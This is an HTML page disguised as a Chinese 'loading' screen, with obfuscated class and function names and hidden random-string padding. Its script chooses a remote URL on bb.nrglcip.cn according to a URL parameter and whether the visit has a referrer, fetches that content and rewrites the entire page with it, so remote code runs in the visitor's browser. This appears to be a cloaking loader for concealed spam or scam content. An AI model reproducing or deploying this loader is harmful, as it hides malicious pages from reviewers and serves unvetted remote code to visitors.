<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pOLh4ZOy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pOLh4ZOy .s3OYDeQ4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pOLh4ZOy .content {
            line-height: 50px;
            text-align: center
        }

        .pOLh4ZOy .img {
            width: 100%
        }

        .pOLh4ZOy .k5oYt0oK2G {
            text-align: center
        }

        .pOLh4ZOy .k5oYt0oK2G span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pOLh4ZOy .k5oYt0oK2G span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pOLh4ZOy .k5oYt0oK2G span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pOLh4ZOy .k5oYt0oK2G span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pOLh4ZOy .k5oYt0oK2G span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pOLh4ZOy .k5oYt0oK2G span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pOLh4ZOy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NLPYIss3H7R(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var eNxlkV = NLPYIss3H7R('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ eNxlkV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ eNxlkV +".html?a=share";
		}
		
        tz0zdVe=url+"#"+new Date().getTime();
        tz0zdVe && function() {
            $.get(tz0zdVe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>mJZiG8Ou4gwCo9j9QosSS0EJliTE8O72gaJyCpaIRGy9Mwy5KQEUuyXlbXhHWzkji16RlUNMWekizD1ABNgHbD79NweHyQwlMp5G</span>
<img  src='' style='display:none'>
<ul style='display:none' >dfONn5D9TK9qPc3C5irbiEEhDLGd6kJvIhlL9YEi6gm8XaP1XKZkpxtsnwMfjYiqlXAWSx</ul>
<a  href='#' style='display:none'>bDdFOGhnxVl8MBoPKjNRthkTk4Zmg8PTerOWkb5tzdh</a>
<b style='display:none' >ao3KumVIdaoP4Oa86</b>
<span style='display:none'>mJZiG8Ou4gwCo9j9QosSS0EJliTE8O72gaJyCpaIRGy9Mwy5KQEUuyXlbXhHWzkji16RlUNMWekizD1ABNgHbD79NweHyQwlMp5G</span><div class="pOLh4ZOy">
    <div class="s3OYDeQ4">
        <div class="k5oYt0oK2G">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>RRuB8j8iw3GBisj6mYcdMTFSal8DBU3r7WPlpb3ebzQsYn3ToHcxVGd0SXp</div>
<li style='display:none' >MyItyF7BEy571B74zX0</li>
<div style='display:none'>RRuB8j8iw3GBisj6mYcdMTFSal8DBU3r7WPlpb3ebzQsYn3ToHcxVGd0SXp</div>
<img  src='' style='display:none'>
<h1 style='display:none' >JdoHDnUoSuyvkSI5yy7TOpiJBqxtMplaogNay5krrKtkYdMQmeVZCbHVYwx2lk</h1>
<b style='display:none' >IqXEGo1jEvyJR8Cl3qye7AQmjIByLQPR5DBrH2xQ1vjJ</b></body>
</html>